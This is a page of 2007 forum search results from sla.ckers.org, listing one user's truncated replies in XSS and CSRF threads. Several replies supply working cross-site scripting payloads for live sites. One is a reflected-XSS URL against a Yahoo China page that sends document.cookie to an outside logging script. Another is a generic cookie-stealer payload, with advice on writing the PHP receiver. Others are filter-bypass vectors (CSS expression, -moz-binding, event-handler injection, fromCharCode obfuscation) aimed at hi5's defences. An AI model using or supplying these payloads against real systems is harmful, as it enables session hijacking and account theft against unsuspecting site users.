Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Pages: 12345Next
Current Page: 1 of 5
Results 1 - 30 of 149
7 years ago
hasse
I have the book!
Forum: XSS Info
7 years ago
hasse
My order shipped today, estimated arrival time is 8 June 2007.
Forum: XSS Info
7 years ago
hasse
Mephisto Wrote: ------------------------------------------------------- > Sorry, I wasn't addressing the (<, ") encoding in > my response. If the application is doing HTML > Encoding (converting < or %3c to &lt;) then your > pretty much out of luck. Unless you can create the XSS inside the tag.
Forum: XSS Info
7 years ago
hasse
digitalIllusionism Wrote: ------------------------------------------------------- > @hasse: > Isn't this byte 219? > Momby's example is functional. I'm not certain > where I would specify a length value, but I only > overwrote between "" and "", rather than changing > the length. In other words: My string is > precisely the same size as Momby's, so
Forum: CSRF and Session Info
7 years ago
hasse
Couldn't you do something like: document.body.innerHTML.replace(input,output); And then add the CSS or other parts you may lose.
Forum: XSS Info
7 years ago
hasse
digitalIllusionism Wrote: ------------------------------------------------------- > > Use a hex editor to edit the file and go to byte > number 219 (the first byte being > > byte 0)." > > I thought a hex editor was any text editor > designed for coding. I've made progress by > learning what a hex editor is. Thank you. I > haven't been successful at usin
Forum: CSRF and Session Info
7 years ago
hasse
How about setting a chrome URL as the homepage somehow? I tried it and I had to edit the config files by hand to stop it from crashing constantly.
Forum: CSRF and Session Info
7 years ago
hasse
digitalIllusionism Wrote: ------------------------------------------------------- > That's the part I don't get. I see no part in the > example that resembles the structure of the string > "0xdb" in the example. I know "0x" denotes the > beginning of a memory address but I don't see how > that has anything to do getting this functional. > It looks like
Forum: CSRF and Session Info
7 years ago
hasse
mynice Wrote: ------------------------------------------------------- > Ehrmmm... JavaScript is fully enabled (no script > blockers or similar) in Firefox2 and IE6. It > doesn't execute in both browsers. :( > > Edit: The "alert(String.fromCharCode(88,83,83))" > is even shown up as a message. I can see this > injection string as message text. Exactly how d
Forum: XSS Info
7 years ago
hasse
fireboy Wrote: ------------------------------------------------------- > none of those solutions work kishord Does something like this work? http://business.cn.yahoo.com/bso?p=&pid="><script>document.write("<img src=http://site.ru/log.php?"%2Bdocument.cookie%2B">")</script>&ei=UTF-8&ch=ch You should be able to do that via an
Forum: XSS Info
7 years ago
hasse
hwEll Wrote: ------------------------------------------------------- > Yeah i know that but am asking the code too.. Just do a Google search for something like "php cookie stealer" and you'll find one.
Forum: XSS Info
7 years ago
hasse
You need a simple PHP script that basically writes the GET-parameters to a file. And then you need to make the user load your PHP script with the cookie as a parameter. For example: http://www.site.com/search.php?q=<script>document.write("<img src=http://your-site.ru/stealer.php?"+document.cookie+">")</script>
Forum: XSS Info
7 years ago
hasse
Try this:style=-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);xx:expression(alert(1111))
Forum: XSS Info
7 years ago
hasse
Delixe Wrote: ------------------------------------------------------- > Yes but how is possible to execute any XSS without > a native tag? I can't use the < in my URL, it > gets stripped completely. Like some other people have mentioned, if you can input data inside tags it's possible. For example: <a href=YOUR_INPUT>Link</a> Just enter "# onmouseover=alert(1)
Forum: XSS Info
7 years ago
hasse
What if you try loading it as an iframe or image? EDIT: CrYpTiC_MauleR said it too...
Forum: XSS Info
7 years ago
hasse
I think this is quite common for sites like that. I've even found SQL-injections on other sites that show you your browser headers.
Forum: XSS Info
7 years ago
hasse
So the book's not quite done yet? Amazon says: Availability: Usually ships within 1 to 3 weeks. Shipping estimate: April 12, 2007 - April 16, 2007 Delivery estimate: April 25, 2007 - May 10, 2007
Forum: XSS Info
7 years ago
hasse
/nul Wrote: ------------------------------------------------------- > Hello, > > I found a site that is vulnerable to XSS via POST > parameter. I just can't reproduce XSS other way > than by inserting tag in Search field. Yeah, I > know about WhiteAcid's XSS POST Forwarder > (http://www.whiteacid.org/misc/xss_post_forwarder. > php). I tried some combinations, but
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote: ------------------------------------------------------- > The IE style vector turned into: > > <A style="xx: )" > href="http://www.hi5.com/friend/profile/displaySameProfile.do?userid=107126449#">a</A> Ok, how about: <a href=# style=xx:expr/*X*/ession(alert(1111))>a</a>
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote: ------------------------------------------------------- > @hasse: > Yes hannil.freehostia.com worked for me. What i > wanted to mean is that the style vectors weren't > able to bypass hi5 filter. Ok, I understand. What part was filtered or what was the problem?
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote: ------------------------------------------------------- > The style vectors didn't worked (at least for > me). Does this work for you in IE or Firefox? http://hannil.freehostia.com/style.html
Forum: XSS Info
7 years ago
hasse
DeltaOne Wrote: ------------------------------------------------------- > Well, they do block a variety of tags. And as > FR3DC3RV said, they block 'ipt>alert(1000)), > 'ipt>alert(1000)', leaving only ipt>alert(1000) > > What about the style vector? What are you > reffering at? Something like this in Firefox: <a href=# style=-moz-binding:url(http://ha.c
Forum: XSS Info
7 years ago
hasse
DeltaOne Wrote: ------------------------------------------------------- > Well, I actually tried , and it rendered - I > tried to find some way to obfuscate that tag. > > I don't think that they check for the endtag for > the script to see if someone inserts the tags, > because I can very easily add alert('omg!') > (although it won't do anything, because doesn't &
Forum: XSS Info
7 years ago
hasse
lobas Wrote: ------------------------------------------------------- > Do you have any examples of how i can use this > method, > as in using > document.location='http://site.com/c.php?c='+escape(document.cookie).substr(0,1900) You can use document.write and String.fromCharCode. For example: <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,100,
Forum: XSS Info
7 years ago
hasse
Well at least the other posts aren't expanded to the right too, like in many other forums. EDIT: Right!
Forum: XSS Info
7 years ago
hasse
@tx: I believe that was something other than what I was thinking about. jungsonn Wrote: ------------------------------------------------------- > @hasse > > Do you mean the dojo toolkit crossdomain ajax > requests? Yes, perhaps that was it. I found a page here that describes it: http://tagneto.blogspot.com/2006/06/cross-domain-frame-communication-with.html
Forum: XSS Info
7 years ago
hasse
Hmm, I just remembered something I read about transferring data between domains using anchors (#), anyone remember what site that was on?
Forum: XSS Info
7 years ago
hasse
trev Wrote: ------------------------------------------------------- > The source code of what? My understanding is that > this is reflexive XSS - the JavaScript code inside > an image will not execute unless you open it in a > frame or a new window and the site itself will > hardly do that. You will have to put this frame > inside a frame on your site and then there will b
Forum: XSS Info
7 years ago
hasse
trev Wrote: ------------------------------------------------------- > The image doesn't have to be malformed, many image > formats allow to put comments into the images. > > If there is no session you cannot steal any > information. You can only create a frame with a > login form and hope the users types his password > into it. Couldn't he read the source code with
Forum: XSS Info
7 years ago
hasse
Mephisto Wrote: ------------------------------------------------------- > okay, found a site where I can put in "" and > anything else like that (, , , etc...), but it > won't allow the start tags (, , , , etc...) Anyone > know of a way around this?? > > It appears to filter anything that is < and any > Aa-Zz character after that. > > Update: I c
Forum: XSS Info
Pages: 12345Next
Current Page: 1 of 5